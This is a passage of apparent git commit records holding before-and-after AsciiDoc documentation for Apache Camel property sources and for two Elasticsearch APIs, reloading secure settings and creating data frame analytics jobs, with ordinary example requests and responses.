`PropertySource`\nAPI from camel-api. 
For example the `camel-microprofile-config` component is implemented using this.\nThe 3rd-party `PropertySource` can automatic be discoverd from classpath when Camel is starting up.\nThis is done by include the file `META-INF\/services\/org\/apache\/camel\/property-source-factory` file\nwhich refers to the fully qualified class name of the `PropertySource` implementation.\nSee the `camel-microprofile-config` for an example.\n\nYou can also register 3rd-part property sources via Java API\n\n[source,java]\n----\nPropertiesComponent pc = ...\npc.addPropertySource(myPropertySource);\n----\n\n=== LoadablePropertySource\n\nA `PropertySource` can define that it supports loading all its properties from the source at once,\nfor example from file system. This allows Camel properties component to load these properties at once\nduring startup.\n\n=== PropertySource\n\nThe regular `PropertySource` will lookup the property on-demand, for example to lookup\nvalues from a backend source such as a database or HashiCorp Vault etc.\n\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0c00a982be3e9cfe6ddf4c7b3aea181524c99a45","subject":"Docs fix node_id spec for secure settings reload API (#55712)","message":"Docs fix node_id spec for secure settings reload API (#55712)\n\nFix docs typo for the `node_id` parameter in the secure settings reload API.","repos":"nknize\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch","old_file":"docs\/reference\/cluster\/nodes-reload-secure-settings.asciidoc","new_file":"docs\/reference\/cluster\/nodes-reload-secure-settings.asciidoc","new_contents":"[[cluster-nodes-reload-secure-settings]]\n=== Nodes reload secure settings API\n++++\n<titleabbrev>Nodes reload secure settings<\/titleabbrev>\n++++\n\nReloads the keystore on nodes in the cluster.\n\n[[cluster-nodes-reload-secure-settings-api-request]]\n==== {api-request-title}\n\n`POST _nodes\/reload_secure_settings` +\n`POST _nodes\/<node_id>\/reload_secure_settings`\n\n[[cluster-nodes-reload-secure-settings-api-desc]]\n==== {api-description-title}\n\n<<secure-settings,Secure settings>> are stored in an on-disk keystore. Certain\nof these settings are <<reloadable-secure-settings,reloadable>>. That is, you\ncan change them on disk and reload them without restarting any nodes in the\ncluster. 
When you have updated reloadable secure settings in your keystore, you\ncan use this API to reload those settings on each node.\n\nWhen the {es} keystore is password protected and not simply obfuscated, you must\nprovide the password for the keystore when you reload the secure settings.\nReloading the settings for the whole cluster assumes that all nodes' keystores\nare protected with the same password; this method is allowed only when\n<<tls-transport,inter-node communications are encrypted>>. Alternatively, you can\nreload the secure settings on each node by locally accessing the API and passing\nthe node-specific {es} keystore password.\n\n[[cluster-nodes-reload-secure-settings-path-params]]\n==== {api-path-parms-title}\n\n`<node_id>`::\n (Optional, string) The names of particular nodes in the cluster to target.\n For example, `nodeId1,nodeId2`. For node selection options, see\n <<cluster-nodes>>.\n\nNOTE: {es} requires consistent secure settings across the cluster nodes, but\nthis consistency is not enforced. Hence, reloading specific nodes is not\nstandard. It is justifiable only when retrying failed reload operations.\n\n[[cluster-nodes-reload-secure-settings-api-request-body]]\n==== {api-request-body-title}\n\n`secure_settings_password`::\n (Optional, string) The password for the {es} keystore.\n\n[[cluster-nodes-reload-secure-settings-api-example]]\n==== {api-examples-title}\n\nThe following examples assume a common password for the {es} keystore on every\nnode of the cluster:\n\n[source,console]\n--------------------------------------------------\nPOST _nodes\/reload_secure_settings\n{\n \"secure_settings_password\":\"s3cr3t\"\n}\nPOST _nodes\/nodeId1,nodeId2\/reload_secure_settings\n{\n \"secure_settings_password\":\"s3cr3t\"\n}\n--------------------------------------------------\n\/\/ TEST[setup:node]\n\/\/ TEST[s\/nodeId1,nodeId2\/*\/]\n\nThe response contains the `nodes` object, which is a map, keyed by the\nnode id. Each value has the node `name` and an optional `reload_exception`\nfield. The `reload_exception` field is a serialization of the exception\nthat was thrown during the reload process, if any.\n\n[source,console-result]\n--------------------------------------------------\n{\n \"_nodes\": {\n \"total\": 1,\n \"successful\": 1,\n \"failed\": 0\n },\n \"cluster_name\": \"my_cluster\",\n \"nodes\": {\n \"pQHNt5rXTTWNvUgOrdynKg\": {\n \"name\": \"node-0\"\n }\n }\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\"my_cluster\"\/$body.cluster_name\/]\n\/\/ TESTRESPONSE[s\/\"pQHNt5rXTTWNvUgOrdynKg\"\/\\$node_name\/]\n","old_contents":"[[cluster-nodes-reload-secure-settings]]\n=== Nodes reload secure settings API\n++++\n<titleabbrev>Nodes reload secure settings<\/titleabbrev>\n++++\n\nReloads the keystore on nodes in the cluster.\n\n[[cluster-nodes-reload-secure-settings-api-request]]\n==== {api-request-title}\n\n`POST _nodes\/reload_secure_settings` +\n`POST _nodes\/<nodes\/reload_secure_settings`\n\n[[cluster-nodes-reload-secure-settings-api-desc]]\n==== {api-description-title}\n\n<<secure-settings,Secure settings>> are stored in an on-disk keystore. Certain\nof these settings are <<reloadable-secure-settings,reloadable>>. That is, you\ncan change them on disk and reload them without restarting any nodes in the\ncluster. 
When you have updated reloadable secure settings in your keystore, you\ncan use this API to reload those settings on each node.\n\nWhen the {es} keystore is password protected and not simply obfuscated, you must\nprovide the password for the keystore when you reload the secure settings.\nReloading the settings for the whole cluster assumes that all nodes' keystores\nare protected with the same password; this method is allowed only when\n<<tls-transport,inter-node communications are encrypted>>. Alternatively, you can\nreload the secure settings on each node by locally accessing the API and passing\nthe node-specific {es} keystore password.\n\n[[cluster-nodes-reload-secure-settings-path-params]]\n==== {api-path-parms-title}\n\n`<nodes>`::\n (Optional, string) The names of particular nodes in the cluster to target.\n For example, `nodeId1,nodeId2`. For node selection options, see\n <<cluster-nodes>>.\n\nNOTE: {es} requires consistent secure settings across the cluster nodes, but\nthis consistency is not enforced. Hence, reloading specific nodes is not\nstandard. It is justifiable only when retrying failed reload operations.\n\n[[cluster-nodes-reload-secure-settings-api-request-body]]\n==== {api-request-body-title}\n\n`secure_settings_password`::\n (Optional, string) The password for the {es} keystore.\n\n[[cluster-nodes-reload-secure-settings-api-example]]\n==== {api-examples-title}\n\nThe following examples assume a common password for the {es} keystore on every\nnode of the cluster:\n\n[source,console]\n--------------------------------------------------\nPOST _nodes\/reload_secure_settings\n{\n \"secure_settings_password\":\"s3cr3t\"\n}\nPOST _nodes\/nodeId1,nodeId2\/reload_secure_settings\n{\n \"secure_settings_password\":\"s3cr3t\"\n}\n--------------------------------------------------\n\/\/ TEST[setup:node]\n\/\/ TEST[s\/nodeId1,nodeId2\/*\/]\n\nThe response contains the `nodes` object, which is a map, keyed by the\nnode id. Each value has the node `name` and an optional `reload_exception`\nfield. 
The `reload_exception` field is a serialization of the exception\nthat was thrown during the reload process, if any.\n\n[source,console-result]\n--------------------------------------------------\n{\n \"_nodes\": {\n \"total\": 1,\n \"successful\": 1,\n \"failed\": 0\n },\n \"cluster_name\": \"my_cluster\",\n \"nodes\": {\n \"pQHNt5rXTTWNvUgOrdynKg\": {\n \"name\": \"node-0\"\n }\n }\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\"my_cluster\"\/$body.cluster_name\/]\n\/\/ TESTRESPONSE[s\/\"pQHNt5rXTTWNvUgOrdynKg\"\/\\$node_name\/]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c355fea8f4f5937d2066bff58f08477180549e5e","subject":"[DOCS] Remove text fields from classification dependent variables (#54849)","message":"[DOCS] Remove text fields from classification dependent variables (#54849)\n\n","repos":"robin13\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch","old_file":"docs\/reference\/ml\/df-analytics\/apis\/put-dfanalytics.asciidoc","new_file":"docs\/reference\/ml\/df-analytics\/apis\/put-dfanalytics.asciidoc","new_contents":"[role=\"xpack\"]\n[testenv=\"platinum\"]\n[[put-dfanalytics]]\n=== Create {dfanalytics-jobs} API\n[subs=\"attributes\"]\n++++\n<titleabbrev>Create {dfanalytics-jobs}<\/titleabbrev>\n++++\n\nInstantiates a {dfanalytics-job}.\n\nexperimental[]\n\n[[ml-put-dfanalytics-request]]\n==== {api-request-title}\n\n`PUT _ml\/data_frame\/analytics\/<data_frame_analytics_id>`\n\n\n[[ml-put-dfanalytics-prereq]]\n==== {api-prereq-title}\n\nIf the {es} {security-features} are enabled, you must have the following \nbuilt-in roles and privileges:\n\n* `machine_learning_admin`\n* `kibana_admin` (UI only)\n\n\n* source index: `read`, `view_index_metadata`\n* destination index: `read`, `create_index`, `manage` and `index`\n* cluster: `monitor` (UI only)\n \nFor more information, see <<security-privileges>> and <<built-in-roles>>.\n\n+\n--\nNOTE: It is possible that secondary authorization headers are supplied in the\nrequest. If this is the case, the secondary authorization headers are used\ninstead of the primary headers.\n--\n\n[[ml-put-dfanalytics-desc]]\n==== {api-description-title}\n\nThis API creates a {dfanalytics-job} that performs an analysis on the source \nindex and stores the outcome in a destination index.\n\nThe destination index will be automatically created if it does not exist. The \n`index.number_of_shards` and `index.number_of_replicas` settings of the source \nindex will be copied over the destination index. 
When the source index matches \nmultiple indices, these settings will be set to the maximum values found in the \nsource indices.\n\nAn attempt is also made to copy the mappings of the source indices over\nto the destination index; however, if the mappings of any of the fields don't \nmatch among the source indices, the attempt will fail with an error message.\n\nIf the destination index already exists, then it will be used as is. This makes \nit possible to set up the destination index in advance with custom settings \nand mappings.\n\n[discrete]\n[[ml-hyperparam-optimization]]\n===== Hyperparameter optimization\n\nIf you don't supply {regression} or {classification} parameters, _hyperparameter \noptimization_ occurs, which sets a value for the undefined parameters. The\nstarting point is calculated for data-dependent parameters by examining the loss\non the training data. Subject to the size constraint, this operation provides an\nupper bound on the improvement in validation loss.\n\nA fixed number of rounds is used for optimization, which depends on the number of \nparameters being optimized. The optimization starts with random search, then \nBayesian optimization is performed, targeting maximum expected \nimprovement. If you override any parameter by explicitly setting it, the \noptimization calculates the values of the remaining parameters accordingly and \nuses the value you provided for the overridden parameter. The number of rounds \nis reduced accordingly. The validation error is estimated in each round by \nusing 4-fold cross validation.\n\n[[ml-put-dfanalytics-path-params]]\n==== {api-path-parms-title}\n\n`<data_frame_analytics_id>`::\n(Required, string)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=job-id-data-frame-analytics-define]\n\n[role=\"child_attributes\"]\n[[ml-put-dfanalytics-request-body]]\n==== {api-request-body-title}\n\n`allow_lazy_start`::\n(Optional, boolean) \ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=allow-lazy-start]\n\n\/\/Begin analysis\n`analysis`::\n(Required, object)\nThe analysis configuration, which contains the information necessary to perform\none of the following types of analysis: {classification}, {oldetection}, or\n{regression}.\n+\n.Properties of `analysis`\n[%collapsible%open]\n====\n\/\/Begin classification\n`classification`:::\n(Required^*^, object)\nThe configuration information necessary to perform\n{ml-docs}\/dfa-classification.html[{classification}].\n+\nTIP: Advanced parameters are for fine-tuning {classanalysis}. They are set \nautomatically by <<ml-hyperparam-optimization,hyperparameter optimization>> \nto give minimum validation error. 
It is highly recommended to use the default \nvalues unless you fully understand the function of these parameters.\n+\n.Properties of `classification`\n[%collapsible%open]\n=====\n`class_assignment_objective`::::\n(Optional, string)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=class-assignment-objective]\n\n`dependent_variable`::::\n(Required, string)\n+\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=dependent-variable]\n+\nThe data type of the field must be numeric (`integer`, `short`, `long`, `byte`), \ncategorical (`ip` or `keyword`), or boolean.\n\n`eta`::::\n(Optional, double) \ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=eta]\n\n`feature_bag_fraction`::::\n(Optional, double) \ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=feature-bag-fraction]\n\n`gamma`::::\n(Optional, double) \ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=gamma]\n\n`lambda`::::\n(Optional, double) \ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=lambda]\n\n`max_trees`::::\n(Optional, integer) \ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=max-trees]\n\n`num_top_classes`::::\n(Optional, integer)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=num-top-classes]\n\n`num_top_feature_importance_values`::::\n(Optional, integer)\nAdvanced configuration option. Specifies the maximum number of\n{ml-docs}\/dfa-classification.html#dfa-classification-feature-importance[feature\nimportance] values per document to return. By default, it is zero and no feature importance\ncalculation occurs.\n\n`prediction_field_name`::::\n(Optional, string) \ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=prediction-field-name]\n\n`randomize_seed`::::\n(Optional, long)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=randomize-seed]\n\n`training_percent`::::\n(Optional, integer)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=training-percent]\n\/\/End classification\n=====\n\/\/Begin outlier_detection\n`outlier_detection`:::\n(Required^*^, object)\nThe configuration information necessary to perform\n{ml-docs}\/dfa-outlier-detection.html[{oldetection}]:\n+\n.Properties of `outlier_detection`\n[%collapsible%open]\n=====\n`compute_feature_influence`::::\n(Optional, boolean) \ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=compute-feature-influence]\n \n`feature_influence_threshold`:::: \n(Optional, double) \ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=feature-influence-threshold]\n\n`method`::::\n(Optional, string)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=method]\n \n`n_neighbors`::::\n(Optional, integer)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=n-neighbors]\n \n`outlier_fraction`::::\n(Optional, double) \ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=outlier-fraction]\n \n`standardization_enabled`::::\n(Optional, boolean) \ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=standardization-enabled]\n\/\/End outlier_detection\n=====\n\/\/Begin regression\n`regression`:::\n(Required^*^, object)\nThe configuration information necessary to perform\n{ml-docs}\/dfa-regression.html[{regression}].\n+\nTIP: Advanced parameters are for fine-tuning {reganalysis}. They are set \nautomatically by <<ml-hyperparam-optimization,hyperparameter optimization>> \nto give minimum validation error. 
It is highly recommended to use the default \nvalues unless you fully understand the function of these parameters.\n+\n.Properties of `regression`\n[%collapsible%open]\n=====\n`dependent_variable`::::\n(Required, string)\n+\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=dependent-variable]\n+\nThe data type of the field must be numeric.\n\n`eta`::::\n(Optional, double)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=eta]\n\n`feature_bag_fraction`::::\n(Optional, double)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=feature-bag-fraction]\n\n`gamma`::::\n(Optional, double) \ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=gamma]\n\n`lambda`::::\n(Optional, double) \ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=lambda]\n\n`max_trees`::::\n(Optional, integer) \ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=max-trees]\n\n`num_top_feature_importance_values`::::\n(Optional, integer)\nAdvanced configuration option. Specifies the maximum number of\n{ml-docs}\/dfa-regression.html#dfa-regression-feature-importance[feature importance] \nvalues per document to return. By default, it is zero and no feature importance\ncalculation occurs.\n\n`prediction_field_name`::::\n(Optional, string)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=prediction-field-name]\n\n`randomize_seed`::::\n(Optional, long)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=randomize-seed]\n\n`training_percent`::::\n(Optional, integer)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=training-percent]\n=====\n\/\/End regression\n====\n\/\/End analysis\n\n\/\/Begin analyzed_fields\n`analyzed_fields`::\n(Optional, object)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=analyzed-fields]\n+\n.Properties of `analyzed_fields`\n[%collapsible%open]\n====\n`excludes`:::\n(Optional, array)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=analyzed-fields-excludes]\n\n`includes`:::\n(Optional, array)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=analyzed-fields-includes]\n\/\/End analyzed_fields\n====\n\n`description`::\n(Optional, string)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=description-dfa]\n\n`dest`::\n(Required, object)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=dest]\n \n`model_memory_limit`::\n(Optional, string)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=model-memory-limit-dfa]\n \n`source`::\n(object)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=source-put-dfa]\n\n[[ml-put-dfanalytics-example]]\n==== {api-examples-title}\n\n[[ml-put-dfanalytics-example-preprocess]]\n===== Preprocessing actions example\n\nThe following example shows how to limit the scope of the analysis to certain \nfields, specify excluded fields in the destination index, and use a query to \nfilter your data before analysis.\n\n[source,console]\n--------------------------------------------------\nPUT _ml\/data_frame\/analytics\/model-flight-delays-pre\n{\n \"source\": {\n \"index\": [\n \"kibana_sample_data_flights\" <1>\n ],\n \"query\": { <2>\n \"range\": {\n \"DistanceKilometers\": { \n \"gt\": 0\n }\n }\n },\n \"_source\": { <3>\n \"includes\": [],\n \"excludes\": [\n \"FlightDelay\",\n \"FlightDelayType\"\n ]\n }\n },\n \"dest\": { <4>\n \"index\": \"df-flight-delays\",\n \"results_field\": \"ml-results\"\n },\n \"analysis\": {\n \"regression\": {\n \"dependent_variable\": \"FlightDelayMin\",\n \"training_percent\": 90\n }\n },\n \"analyzed_fields\": { <5>\n \"includes\": [],\n \"excludes\": [ \n \"FlightNum\"\n ]\n },\n \"model_memory_limit\": \"100mb\"\n}\n--------------------------------------------------\n\/\/ TEST[skip:setup kibana sample 
data]\n\n<1> The source index to analyze.\n<2> This query filters out entire documents that will not be present in the \ndestination index.\n<3> The `_source` object defines fields in the dataset that will be included or \nexcluded in the destination index. In this case, `includes` does not specify any \nfields, so the default behavior takes place: all the fields of the source index \nwill be included except the ones that are explicitly specified in `excludes`.\n<4> Defines the destination index that contains the results of the analysis and \nthe fields of the source index specified in the `_source` object. Also defines \nthe name of the `results_field`.\n<5> Specifies fields to be included in or excluded from the analysis. This does \nnot affect whether the fields will be present in the destination index, it only \naffects whether they are used in the analysis.\n\nIn this example, we can see that all the fields of the source index are included \nin the destination index except `FlightDelay` and `FlightDelayType` because \nthese are defined as excluded fields by the `excludes` parameter of the \n`_source` object. The `FlightNum` field is included in the destination index, \nhowever it is not included in the analysis because it is explicitly specified as \nan excluded field by the `excludes` parameter of the `analyzed_fields` object.\n\n\n[[ml-put-dfanalytics-example-od]]\n===== {oldetection-cap} example\n\nThe following example creates the `loganalytics` {dfanalytics-job}, the analysis \ntype is `outlier_detection`:\n\n[source,console]\n--------------------------------------------------\nPUT _ml\/data_frame\/analytics\/loganalytics\n{\n \"description\": \"Outlier detection on log data\",\n \"source\": {\n \"index\": \"logdata\"\n },\n \"dest\": {\n \"index\": \"logdata_out\"\n },\n \"analysis\": {\n \"outlier_detection\": {\n \"compute_feature_influence\": true,\n \"outlier_fraction\": 0.05,\n \"standardization_enabled\": true\n }\n }\n}\n--------------------------------------------------\n\/\/ TEST[setup:setup_logdata]\n\n\nThe API returns the following result:\n\n[source,console-result]\n----\n{\n \"id\": \"loganalytics\",\n \"description\": \"Outlier detection on log data\",\n \"source\": {\n \"index\": [\"logdata\"],\n \"query\": {\n \"match_all\": {}\n }\n },\n \"dest\": {\n \"index\": \"logdata_out\",\n \"results_field\": \"ml\"\n },\n \"analysis\": {\n \"outlier_detection\": {\n \"compute_feature_influence\": true,\n \"outlier_fraction\": 0.05,\n \"standardization_enabled\": true\n }\n },\n \"model_memory_limit\": \"1gb\",\n \"create_time\" : 1562265491319,\n \"version\" : \"8.0.0\",\n \"allow_lazy_start\" : false\n}\n----\n\/\/ TESTRESPONSE[s\/1562265491319\/$body.$_path\/]\n\/\/ TESTRESPONSE[s\/\"version\" : \"8.0.0\"\/\"version\" : $body.version\/]\n\n\n[[ml-put-dfanalytics-example-r]]\n===== {regression-cap} examples\n\nThe following example creates the `house_price_regression_analysis` \n{dfanalytics-job}, the analysis type is `regression`:\n\n[source,console]\n--------------------------------------------------\nPUT _ml\/data_frame\/analytics\/house_price_regression_analysis\n{\n \"source\": {\n \"index\": \"houses_sold_last_10_yrs\"\n },\n \"dest\": {\n \"index\": \"house_price_predictions\"\n },\n \"analysis\": \n {\n \"regression\": {\n \"dependent_variable\": \"price\"\n }\n }\n}\n--------------------------------------------------\n\/\/ TEST[skip:TBD]\n\n\nThe API returns the following result:\n\n[source,console-result]\n----\n{\n \"id\" : \"house_price_regression_analysis\",\n 
\"source\" : {\n \"index\" : [\n \"houses_sold_last_10_yrs\"\n ],\n \"query\" : {\n \"match_all\" : { }\n }\n },\n \"dest\" : {\n \"index\" : \"house_price_predictions\",\n \"results_field\" : \"ml\"\n },\n \"analysis\" : {\n \"regression\" : {\n \"dependent_variable\" : \"price\",\n \"training_percent\" : 100\n }\n },\n \"model_memory_limit\" : \"1gb\",\n \"create_time\" : 1567168659127,\n \"version\" : \"8.0.0\",\n \"allow_lazy_start\" : false\n}\n----\n\/\/ TESTRESPONSE[s\/1567168659127\/$body.$_path\/]\n\/\/ TESTRESPONSE[s\/\"version\": \"8.0.0\"\/\"version\": $body.version\/]\n\n\nThe following example creates a job and specifies a training percent:\n\n[source,console]\n--------------------------------------------------\nPUT _ml\/data_frame\/analytics\/student_performance_mathematics_0.3\n{\n \"source\": {\n \"index\": \"student_performance_mathematics\"\n },\n \"dest\": {\n \"index\":\"student_performance_mathematics_reg\"\n },\n \"analysis\":\n {\n \"regression\": {\n \"dependent_variable\": \"G3\",\n \"training_percent\": 70, <1>\n \"randomize_seed\": 19673948271 <2>\n }\n }\n}\n--------------------------------------------------\n\/\/ TEST[skip:TBD]\n\n<1> The `training_percent` defines the percentage of the data set that will be \nused for training the model.\n<2> The `randomize_seed` is the seed used to randomly pick which data is used \nfor training.\n\n\n[[ml-put-dfanalytics-example-c]]\n===== {classification-cap} example\n\nThe following example creates the `loan_classification` {dfanalytics-job}, the \nanalysis type is `classification`:\n\n[source,console]\n--------------------------------------------------\nPUT _ml\/data_frame\/analytics\/loan_classification\n{\n \"source\" : {\n \"index\": \"loan-applicants\"\n },\n \"dest\" : {\n \"index\": \"loan-applicants-classified\"\n },\n \"analysis\" : {\n \"classification\": {\n \"dependent_variable\": \"label\",\n \"training_percent\": 75,\n \"num_top_classes\": 2\n }\n }\n}\n--------------------------------------------------\n\/\/ TEST[skip:TBD]\n","old_contents":"[role=\"xpack\"]\n[testenv=\"platinum\"]\n[[put-dfanalytics]]\n=== Create {dfanalytics-jobs} API\n[subs=\"attributes\"]\n++++\n<titleabbrev>Create {dfanalytics-jobs}<\/titleabbrev>\n++++\n\nInstantiates a {dfanalytics-job}.\n\nexperimental[]\n\n[[ml-put-dfanalytics-request]]\n==== {api-request-title}\n\n`PUT _ml\/data_frame\/analytics\/<data_frame_analytics_id>`\n\n\n[[ml-put-dfanalytics-prereq]]\n==== {api-prereq-title}\n\nIf the {es} {security-features} are enabled, you must have the following \nbuilt-in roles and privileges:\n\n* `machine_learning_admin`\n* `kibana_admin` (UI only)\n\n\n* source index: `read`, `view_index_metadata`\n* destination index: `read`, `create_index`, `manage` and `index`\n* cluster: `monitor` (UI only)\n \nFor more information, see <<security-privileges>> and <<built-in-roles>>.\n\n+\n--\nNOTE: It is possible that secondary authorization headers are supplied in the\nrequest. If this is the case, the secondary authorization headers are used\ninstead of the primary headers.\n--\n\n[[ml-put-dfanalytics-desc]]\n==== {api-description-title}\n\nThis API creates a {dfanalytics-job} that performs an analysis on the source \nindex and stores the outcome in a destination index.\n\nThe destination index will be automatically created if it does not exist. The \n`index.number_of_shards` and `index.number_of_replicas` settings of the source \nindex will be copied over the destination index. 
When the source index matches \nmultiple indices, these settings will be set to the maximum values found in the \nsource indices.\n\nThe mappings of the source indices are also attempted to be copied over\nto the destination index, however, if the mappings of any of the fields don't \nmatch among the source indices, the attempt will fail with an error message.\n\nIf the destination index already exists, then it will be use as is. This makes \nit possible to set up the destination index in advance with custom settings \nand mappings.\n\n[discrete]\n[[ml-hyperparam-optimization]]\n===== Hyperparameter optimization\n\nIf you don't supply {regression} or {classification} parameters, _hyperparameter \noptimization_ occurs, which sets a value for the undefined parameters. The\nstarting point is calculated for data dependent parameters by examining the loss\non the training data. Subject to the size constraint, this operation provides an\nupper bound on the improvement in validation loss.\n\nA fixed number of rounds is used for optimization which depends on the number of \nparameters being optimized. The optimization starts with random search, then \nBayesian optimization is performed that is targeting maximum expected \nimprovement. If you override any parameters by explicitely setting it, the \noptimization calculates the value of the remaining parameters accordingly and \nuses the value you provided for the overridden parameter. The number of rounds \nare reduced respectively. The validation error is estimated in each round by \nusing 4-fold cross validation.\n\n[[ml-put-dfanalytics-path-params]]\n==== {api-path-parms-title}\n\n`<data_frame_analytics_id>`::\n(Required, string)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=job-id-data-frame-analytics-define]\n\n[role=\"child_attributes\"]\n[[ml-put-dfanalytics-request-body]]\n==== {api-request-body-title}\n\n`allow_lazy_start`::\n(Optional, boolean) \ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=allow-lazy-start]\n\n\/\/Begin analysis\n`analysis`::\n(Required, object)\nThe analysis configuration, which contains the information necessary to perform\none of the following types of analysis: {classification}, {oldetection}, or\n{regression}.\n+\n.Properties of `analysis`\n[%collapsible%open]\n====\n\/\/Begin classification\n`classification`:::\n(Required^*^, object)\nThe configuration information necessary to perform\n{ml-docs}\/dfa-classification.html[{classification}].\n+\nTIP: Advanced parameters are for fine-tuning {classanalysis}. They are set \nautomatically by <<ml-hyperparam-optimization,hyperparameter optimization>> \nto give minimum validation error. 
It is highly recommended to use the default \nvalues unless you fully understand the function of these parameters.\n+\n.Properties of `classification`\n[%collapsible%open]\n=====\n`class_assignment_objective`::::\n(Optional, string)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=class-assignment-objective]\n\n`dependent_variable`::::\n(Required, string)\n+\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=dependent-variable]\n+\nThe data type of the field must be numeric (`integer`, `short`, `long`, `byte`), \ncategorical (`ip`, `keyword`, `text`), or boolean.\n\n`eta`::::\n(Optional, double) \ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=eta]\n\n`feature_bag_fraction`::::\n(Optional, double) \ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=feature-bag-fraction]\n\n`gamma`::::\n(Optional, double) \ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=gamma]\n\n`lambda`::::\n(Optional, double) \ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=lambda]\n\n`max_trees`::::\n(Optional, integer) \ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=max-trees]\n\n`num_top_classes`::::\n(Optional, integer)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=num-top-classes]\n\n`num_top_feature_importance_values`::::\n(Optional, integer)\nAdvanced configuration option. Specifies the maximum number of\n{ml-docs}\/dfa-classification.html#dfa-classification-feature-importance[feature\nimportance] values per document to return. By default, it is zero and no feature importance\ncalculation occurs.\n\n`prediction_field_name`::::\n(Optional, string) \ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=prediction-field-name]\n\n`randomize_seed`::::\n(Optional, long)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=randomize-seed]\n\n`training_percent`::::\n(Optional, integer)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=training-percent]\n\/\/End classification\n=====\n\/\/Begin outlier_detection\n`outlier_detection`:::\n(Required^*^, object)\nThe configuration information necessary to perform\n{ml-docs}\/dfa-outlier-detection.html[{oldetection}]:\n+\n.Properties of `outlier_detection`\n[%collapsible%open]\n=====\n`compute_feature_influence`::::\n(Optional, boolean) \ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=compute-feature-influence]\n \n`feature_influence_threshold`:::: \n(Optional, double) \ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=feature-influence-threshold]\n\n`method`::::\n(Optional, 